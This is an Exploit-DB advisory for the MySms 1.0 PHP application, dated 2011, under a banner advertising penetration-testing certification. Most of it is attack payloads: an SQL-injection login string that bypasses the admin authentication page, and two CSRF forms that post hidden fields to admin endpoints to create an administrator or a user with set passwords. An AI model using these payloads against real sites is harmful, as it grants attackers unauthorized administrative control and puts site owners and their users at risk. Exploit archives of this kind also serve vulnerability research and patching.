MySms 1.0 - Multiple Vulnerabilities

EDB-ID:

16279

CVE:

N/A




Platform:

PHP

Date:

2011-03-05


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

MySms v1.0 Multiple Vulnerabilities 
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]

####################################################################

===[ Exploit ]===

[1]Auth Bypass
===============

www.site.com/MySms/admin/index.php

Username: 'or'a'='a
Password: 'or'a'='a

[2]CSRF
=======
[Add Admin]
------------

<form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php">
<input type="hidden" name="username" value="Webadmin"/>
<input type="hidden" name="passwd" value="123456"/>
</form>

</body>
</html>


[Add User]
-----------

<form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php">
<input type="hidden" name="username" value="user"/>
<input type="hidden" name="passwd" value="123456"/>
<input type="hidden" name="active" value="y"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="sex" value="m"/>
<input type="hidden" name="level" value="a"/>
<input type="hidden" name="num_msg" value="100"/>
</form>

</body>
</html>
####################################################################